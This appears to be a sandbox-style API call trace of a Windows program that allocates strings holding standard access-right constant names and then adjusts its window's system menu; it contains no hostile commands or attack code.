[0100.345] SysReAllocStringLen (in: pbstr=0x2ace5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace5e0*="READ_CONTROL") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace5d0*="WRITE_OWNER") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace5c0*="WRITE_DAC") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2ace5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2ace5a0*="THREAD_IMPERSONATE") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2ace590*="THREAD_SET_THREAD_TOKEN") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2ace580*="THREAD_QUERY_INFORMATION") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2ace570*="THREAD_SET_INFORMATION") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2ace560*="THREAD_SET_CONTEXT") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2ace550*="THREAD_GET_CONTEXT") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2ace540*="THREAD_SUSPEND_RESUME") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2ace530*="THREAD_TERMINATE") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2ace520*="THREAD_ALL_ACCESS") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace500*="STANDARD_RIGHTS_WRITE") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace4f0*="STANDARD_RIGHTS_READ") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace4e0*="STANDARD_RIGHTS_ALL") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace4d0*="DELETE") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace4c0*="READ_CONTROL") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace4b0*="WRITE_OWNER") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace4a0*="WRITE_DAC") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2ace490*="PROCESS_QUERY_INFORMATION") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2ace480*="PROCESS_SET_INFORMATION") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2ace470*="PROCESS_SET_QUOTA") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2ace460*="PROCESS_CREATE_PROCESS") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2ace450*="PROCESS_DUP_HANDLE") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2ace440*="PROCESS_VM_WRITE") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2ace430*="PROCESS_VM_READ") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2ace420*="PROCESS_VM_OPERATION") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2ace410*="PROCESS_SET_SESSIONID") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2ace400*="PROCESS_CREATE_THREAD") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2ace3f0*="PROCESS_TERMINATE") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2ace3e0*="PROCESS_ALL_ACCESS") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace3b0*="STANDARD_RIGHTS_READ") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace3a0*="STANDARD_RIGHTS_ALL") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace390*="DELETE") returned 1
[0100.346] SysReAllocStringLen (in: pbstr=0x2ace380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace380*="READ_CONTROL") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace370*="WRITE_OWNER") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace360*="WRITE_DAC") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2ace350*="PERM_FILE_CREATE") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2ace340*="PERM_FILE_WRITE") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2ace330*="PERM_FILE_READ") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace310*="STANDARD_RIGHTS_WRITE") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace300*="STANDARD_RIGHTS_READ") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace2f0*="STANDARD_RIGHTS_ALL") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace2e0*="DELETE") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace2d0*="READ_CONTROL") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace2c0*="WRITE_OWNER") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace2b0*="WRITE_DAC") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2ace2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2ace290*="PRINTER_ACCESS_USE") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2ace280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2ace270*="SERVER_ACCESS_ENUMERATE") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2ace260*="SERVER_ACCESS_ADMINISTER") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2ace250*="PRINTER_ALL_ACCESS") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2ace240*="PRINTER_EXECUTE") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2ace230*="PRINTER_WRITE") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2ace220*="PRINTER_READ") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2ace210*="PRINTER_ALL_ACCESS") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace200*="DELETE") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace1f0*="READ_CONTROL") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace1e0*="WRITE_OWNER") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace1d0*="WRITE_DAC") returned 1
[0100.347] SysReAllocStringLen (in: pbstr=0x2ace1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2ace1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2ace1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2ace1a0*="SC_MANAGER_LOCK") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2ace190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2ace180*="SC_MANAGER_CONNECT") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2ace170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2ace160*="SC_MANAGER_ALL_ACCESS") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace140*="STANDARD_RIGHTS_WRITE") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace130*="STANDARD_RIGHTS_READ") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace120*="STANDARD_RIGHTS_ALL") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace110*="DELETE") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace100*="READ_CONTROL") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace0f0*="WRITE_OWNER") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace0e0*="WRITE_DAC") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2ace0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2ace0c0*="SERVICE_STOP") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2ace0b0*="SERVICE_START") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2ace0a0*="SERVICE_QUERY_STATUS") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2ace090*="SERVICE_QUERY_CONFIG") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2ace080*="SERVICE_PAUSE_CONTINUE") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2ace070*="SERVICE_INTERROGATE") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2ace060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2ace050*="SERVICE_CHANGE_CONFIG") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2ace040*="SERVICE_ALL_ACCESS") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace020*="STANDARD_RIGHTS_WRITE") returned 1
[0100.348] SysReAllocStringLen (in: pbstr=0x2ace010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace010*="STANDARD_RIGHTS_READ") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2ace000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace000*="STANDARD_RIGHTS_ALL") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2acdff0*="DELETE") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2acdfe0*="READ_CONTROL") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2acdfd0*="WRITE_OWNER") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2acdfc0*="WRITE_DAC") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2acdfb0*="KEY_SET_VALUE") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2acdfa0*="KEY_CREATE_LINK") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdf90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2acdf90*="KEY_CREATE_SUB_KEY") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdf80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2acdf80*="KEY_NOTIFY") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdf70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2acdf70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdf60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2acdf60*="KEY_QUERY_VALUE") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdf50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2acdf50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdf40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2acdf40*="STANDARD_RIGHTS_WRITE") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdf30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2acdf30*="STANDARD_RIGHTS_READ 2") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdf20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2acdf20*="STANDARD_RIGHTS_ALL 1") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdf10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2acdf10*="DELETE") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdf00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2acdf00*="READ_CONTROL") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdef0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2acdef0*="WRITE_OWNER") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2acdee0*="WRITE_DAC") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2acded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2acdec0*="DESKTOP_WRITEOBJECTS") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdeb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2acdeb0*="DESKTOP_JOURNALRECORD") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acdea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2acdea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acde90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2acde90*="DESKTOP_HOOKCONTROL") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acde80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2acde80*="DESKTOP_CREATEWINDOW") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acde70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2acde70*="DESKTOP_CREATEMENU") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acde60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2acde60*="DESKTOP_READOBJECTS") returned 1
[0100.349] SysReAllocStringLen (in: pbstr=0x2acde50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2acde50*="DESKTOP_ENUMERATE") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acde40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2acde40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acde30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2acde30*="STANDARD_RIGHTS_WRITE") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acde20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2acde20*="STANDARD_RIGHTS_READ") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acde10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2acde10*="STANDARD_RIGHTS_ALL") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acde00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2acde00*="DELETE") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2acddf0*="READ_CONTROL") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2acdde0*="WRITE_OWNER") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2acddd0*="WRITE_DAC") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2acddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2acddb0*="WINSTA_READSCREEN") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2acdda0*="WINSTA_READATTRIBUTES") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2acdd90*="WINSTA_EXITWINDOWS") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2acdd80*="WINSTA_ENUMERATE") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2acdd70*="WINSTA_ENUMDESKTOPS") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2acdd60*="WINSTA_CREATEDESKTOP") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2acdd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2acdd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2acdd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2acdd20*="STANDARD_RIGHTS_WRITE") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2acdd10*="STANDARD_RIGHTS_READ") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2acdd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2acdcf0*="READ_CONTROL") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2acdce0*="SI_ACCESS_SPECIFIC") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2acdcd0*="WRITE_DAC") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2acdcc0*="FILE_DELETE") returned 1
[0100.350] SysReAllocStringLen (in: pbstr=0x2acdcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2acdcb0*="FILE_DELETE_CHILD") returned 1
[0100.352] SetClassLongA (hWnd=0x301d8, nIndex=-14, dwNewLong=65575) returned 0x0
[0100.352] GetSystemMenu (hWnd=0x301d8, bRevert=0) returned 0x20223
[0100.353] DeleteMenu (hMenu=0x20223, uPosition=0xf030, uFlags=0x0) returned 1
[0100.353] DeleteMenu (hMenu=0x20223, uPosition=0xf000, uFlags=0x0) returned 1
[0100.353] DeleteMenu (hMenu=0x20223, uPosition=0xf010, uFlags=0x0) returned 1
[0100.353] GetCurrentThreadId () returned 0xf78
[0100.353] ResetEvent (hEvent=0xa0) returned 1
[0100.353] GetCurrentThreadId () returned 0xf78
[0100.353] GetCurrentThreadId () returned 0xf78
[0100.353] GetCurrentThreadId () returned 0xf78
[0100.353] ResetEvent (hEvent=0xa0) returned 1
[0100.353] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22f414, fWinIni=0x0 | out: pvParam=0x22f414) returned 1
[0100.353] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22f414, fWinIni=0x0 | out: pvParam=0x22f414) returned 1
[0100.353] GetSystemMetrics (nIndex=49) returned 16
[0100.353] GetSystemMetrics (nIndex=50) returned 16
[0100.353] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22f45c, fWinIni=0x0 | out: pvParam=0x22f45c) returned 1
